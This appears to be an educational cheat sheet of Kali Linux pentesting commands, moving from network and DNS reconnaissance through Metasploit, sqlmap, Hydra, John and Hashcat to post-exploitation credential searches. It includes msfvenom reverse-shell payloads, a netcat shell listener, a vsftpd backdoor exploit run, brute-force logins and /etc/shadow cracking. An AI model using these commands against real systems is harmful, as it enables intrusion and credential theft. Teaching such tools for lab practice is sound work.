Nmap (Network Mapper) is the single most important tool in a penetration tester’s kit.
It discovers live hosts on a network, identifies open ports, detects the services and
versions running on those ports, and can fingerprint the target’s operating system.
Every pentest begins with nmap.

Core syntax

nmap [options] 

Three essential scans to know

# 1. Quick service + version detection (most common starting point)
nmap -sV -sC 192.168.1.10

# 2. Aggressive scan — OS detection, version, scripts, traceroute
nmap -A -T4 192.168.1.10

# 3. Full port scan — all 65535 ports (slower, finds hidden services)
nmap -p- 192.168.1.10

Sample output (truncated)

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9
80/tcp   open  http       Apache httpd 2.4.38
443/tcp  open  ssl/https
3306/tcp open  mysql      MySQL 5.7.30

whois queries domain registration databases to reveal the domain owner,
registrar, registration/expiry dates, name servers, and sometimes contact email addresses.
It is the first OSINT step when a domain name is your starting point.

Core syntax

whois 

Example

whois example.com

Domain Name: EXAMPLE.COM
Registrar: RESERVED-Internet Assigned Numbers Authority
Registrar IANA ID: 376
Updated Date: 2023-08-14
Creation Date: 1995-08-14
Registrar Abuse Contact Email: abuse@iana.org
Name Server: A.IANA-SERVERS.NET

dig (Domain Information Groper) is the go-to tool for querying DNS records.
Unlike nslookup, it gives detailed, scriptable output and supports advanced
queries including zone transfer attempts. DNS enumeration can reveal subdomains, mail servers,
and internal infrastructure that is not publicly advertised.

Core syntax

dig [record type]  [@nameserver]

Key examples

# Get A records (IP address)
dig A example.com

# Get MX records (mail servers)
dig MX example.com

# Get all records
dig ANY example.com

# Attempt a DNS zone transfer (reveals all DNS records if misconfigured)
dig axfr example.com @ns1.example.com

theHarvester is a passive OSINT tool that searches public data sources (Google, Bing,
LinkedIn, Hunter.io, Shodan, and more) to harvest email addresses, employee names,
subdomains, and IP addresses associated with a target domain. It requires no direct
contact with the target — everything is gathered from third-party sources.

Core syntax

theHarvester -d  -b 

Example

# Search Google and LinkedIn for emails and subdomains
theHarvester -d targetcompany.com -b google,linkedin

# Use all available sources (slower but thorough)
theHarvester -d targetcompany.com -b all

Gobuster brute-forces hidden directories, files, and subdomains against a web server using
a wordlist. It is significantly faster than its predecessor dirb because it
runs concurrent threads. Hidden admin panels, backup files, and config directories are
routinely found this way.

Core syntax

gobuster dir -u  -w 

Key examples

# Directory brute force with common wordlist
gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirb/common.txt

# Add file extensions to find backups and config files
gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt,bak

# Subdomain enumeration mode
gobuster dns -d targetcompany.com -w /usr/share/wordlists/dns/subdomains-top1million-5000.txt

Nikto scans a web server for over 6,700 known vulnerabilities, dangerous files, outdated
server software, and common misconfigurations. It is noisy (easily detected) but fast,
and is almost always run during the early recon phase of a web application pentest.

Core syntax

nikto -h 

Example

# Basic scan
nikto -h http://192.168.1.10

# Save output to a file for your report
nikto -h http://192.168.1.10 -o nikto-results.txt

netstat displays active network connections, listening ports, routing tables,
and network interface statistics. For a penetration tester it answers a critical question:
what services are actually running and accepting connections on this machine right now?

Core syntax

netstat [options]

The one command to remember

# Show all listening TCP/UDP ports with PID — the most useful single command
netstat -tulnp

Proto  Local Address     State       PID/Program
tcp    0.0.0.0:22        LISTEN      1023/sshd
tcp    0.0.0.0:80        LISTEN      887/apache2
tcp    0.0.0.0:3306      LISTEN      1145/mysqld

# Modern replacement — ss is faster on newer Kali versions
ss -tulnp

Before running any network command, you need to know your own IP address and which
interface you are on. ifconfig is the classic command; ip a
(ip addr show) is the modern replacement and is now standard on Kali Linux.

Core syntax

# Modern (preferred on Kali 2022+)
ip a

# Classic — still works, still widely referenced
ifconfig

# Set an IP address on an interface (useful in lab environments)
ip addr add 192.168.1.100/24 dev eth0

Netcat is one of the most versatile tools in existence. It reads and writes raw data
across network connections using TCP or UDP. Pentesters use it for: catching reverse
shells, banner grabbing, port scanning, file transfers, and setting up simple listeners.
Learning netcat is non-negotiable.

Core syntax

nc [options]  

Two essential use cases

# Use case 1: Banner grabbing — identify a service version
nc -v 192.168.1.10 80
Connection to 192.168.1.10 80 port [tcp/http] succeeded!
Apache/2.4.38 (Debian) Server

# Use case 2: Set up a reverse shell listener on your attack machine
# Run this FIRST on your Kali box, then trigger the payload on the target
nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received from 192.168.1.20...

Tcpdump is the command-line packet analyser. Where Wireshark gives you a GUI,
tcpdump works entirely in the terminal — essential when you are on a remote system
with no desktop environment. Captures can be saved as .pcap files and
opened in Wireshark later for analysis.

Core syntax

tcpdump [options] [filter expression]

Key examples

# Capture all traffic on eth0
tcpdump -i eth0

# Capture HTTP traffic only and save to file
tcpdump -i eth0 tcp port 80 -w http-capture.pcap

# Read a saved capture file
tcpdump -r http-capture.pcap

# Filter by host IP
tcpdump -i eth0 host 192.168.1.10

arp-scan sends ARP packets to every address in a subnet and reports which hosts
respond. It is faster and more reliable than an Nmap ping sweep for local network discovery
because ARP cannot be blocked by a host’s firewall — every device on the LAN must respond
to ARP requests to function on the network.

Core syntax

arp-scan [options] 

Example

# Scan the entire local subnet
arp-scan -l

192.168.1.1   00:1a:2b:3c:4d:5e   Cisco Systems, Inc.
192.168.1.10  aa:bb:cc:dd:ee:ff   VMware, Inc.
192.168.1.20  11:22:33:44:55:66   Unknown

Metasploit Framework is the world’s most widely used penetration testing platform.
It contains thousands of exploits, payloads, auxiliary modules, and post-exploitation
tools. msfconsole is the command-line interface to the entire framework.

Core workflow

# Launch Metasploit
msfconsole

# Search for exploits related to a service
msf6 > search type:exploit name:vsftpd

# Select an exploit
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

# View required options
msf6 exploit(vsftpd_234_backdoor) > show options

# Set the target
msf6 exploit(vsftpd_234_backdoor) > set RHOSTS 192.168.1.20

# Run the exploit
msf6 exploit(vsftpd_234_backdoor) > run

[*] Exploit running...
[+] 192.168.1.20:21 - Backdoor service has been spawned
[*] Command shell session 1 opened

Searchsploit is a command-line tool for the Exploit-DB archive — a database of
thousands of public exploits. Unlike searching the website, searchsploit works
completely offline, which is critical when you are in a network-isolated pentest
environment. Once found, exploits can be copied directly to your working directory.

Core syntax

searchsploit 

Key examples

# Search for Apache exploits
searchsploit apache 2.4

# Search for a specific CVE
searchsploit CVE-2021-41773

# Copy the exploit file to your current directory
searchsploit -m exploits/linux/remote/49765.py

sqlmap automates the detection and exploitation of SQL injection vulnerabilities.
It can identify the injection type, extract database names, dump tables, and in
some cases even gain operating system access. It is the most used tool in bug bounty
for SQL injection findings.

Core syntax

sqlmap -u  [options]

Key examples — tested on DVWA (legal practice)

# Basic injection test on a URL parameter
sqlmap -u "http://192.168.1.10/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=abc123; security=low"

# Enumerate all databases if injection found
sqlmap -u "http://192.168.1.10/dvwa/...&id=1" --cookie="..." --dbs

# Dump a specific table
sqlmap -u "..." -D dvwa -T users --dump

msfvenom generates standalone malicious payloads for any platform and architecture —
Windows executables, Linux ELF binaries, PHP web shells, Python scripts, and more.
It is the tool you use to create the “bait” that, when executed on a target,
opens a reverse shell back to your Metasploit listener.

Core syntax

msfvenom -p  LHOST= LPORT= -f  -o 

Key examples

# Windows reverse shell executable
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe -o shell.exe

# Linux reverse shell ELF binary
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf -o shell.elf

# PHP reverse shell (web server exploitation)
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f raw -o shell.php

Hydra is a fast, parallelised online password cracking tool that supports over 50
protocols — SSH, FTP, HTTP forms, RDP, SMB, MySQL, and more. It takes a username
(or list of usernames) and a password wordlist and tries every combination against
a live login service.

Core syntax

hydra -l  -P   

Two most useful examples

# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.20 ssh

# HTTP POST form brute force (web login page)
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.10 http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid password"

# Multiple usernames from a file, limit threads to avoid lockout
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 192.168.1.20 ssh

John the Ripper (JTR) is the go-to tool for offline password hash cracking.
Unlike Hydra which attacks live services, John works on hashes you have already
obtained — from /etc/shadow, a database dump, or a captured NTLM hash.
It automatically identifies the hash format and supports wordlist, rule-based,
and brute force attack modes.

Core syntax

john [options] 

Key examples

# Crack with rockyou.txt wordlist (auto-detects hash format)
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Force a specific format (when auto-detect is wrong)
john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Show cracked passwords
john --show hashes.txt

# Combine /etc/passwd and /etc/shadow, then crack
unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt

Hashcat is the world’s fastest password recovery tool. It leverages GPU acceleration
to crack hashes at extraordinary speed — while John the Ripper might crack MD5 at
a few million hashes per second on a CPU, Hashcat can do billions per second on a
modern GPU. It supports over 300 hash types.

Core syntax

hashcat -m  -a   

Common hash type codes (-m)

# -m 0    = MD5
# -m 100  = SHA1
# -m 1000 = NTLM (Windows)
# -m 1800 = sha512crypt (Linux /etc/shadow)
# -m 3200 = bcrypt

Key examples

# Crack NTLM hashes with rockyou.txt (most common pentest scenario)
hashcat -m 1000 -a 0 ntlm-hashes.txt /usr/share/wordlists/rockyou.txt

# Add rules to mutate the wordlist (password1 → Password1! etc.)
hashcat -m 1000 -a 0 ntlm-hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Show cracked passwords
hashcat -m 1000 ntlm-hashes.txt --show

chmod changes file permissions; chown changes file ownership.
These are essential for making exploit scripts executable, setting up web shells with
correct permissions, and understanding how file permission misconfigurations can be
exploited during privilege escalation.

Core syntax

chmod  
chown : 

Octal permission cheatsheet

# 7 = rwx (read, write, execute) — full permissions
# 5 = r-x (read, execute) — typical for directories
# 4 = r-- (read only)

# Make a script executable (pentesters do this constantly)
chmod +x exploit.sh
chmod 755 exploit.sh       # owner: rwx | group: r-x | others: r-x

# Lock down a sensitive file
chmod 600 id_rsa           # SSH private key must be 600 or ssh refuses it

find / -perm -4000 2>/dev/null

grep searches file content for patterns.
find searches the file system for files matching criteria.
Individually they are basic utilities; combined with hacker-specific patterns,
they become post-exploitation powerhouses for finding credentials, config files,
and misconfigurations hiding on a compromised system.

Hacker-specific use cases

# Search config files for plaintext passwords
grep -r "password" /var/www/html/ --include="*.php"
grep -ri "passwd\|password\|secret\|api_key" /etc/ 2>/dev/null

# Find all SUID root binaries (privilege escalation)
find / -perm -4000 2>/dev/null

# Find world-writable files (misconfig hunting)
find / -perm -o+w -type f 2>/dev/null

# Find files modified in the last 10 minutes (useful after exploitation)
find / -mmin -10 -type f 2>/dev/null

# Search command history for credentials
grep -i "pass\|ssh\|key\|token" ~/.bash_history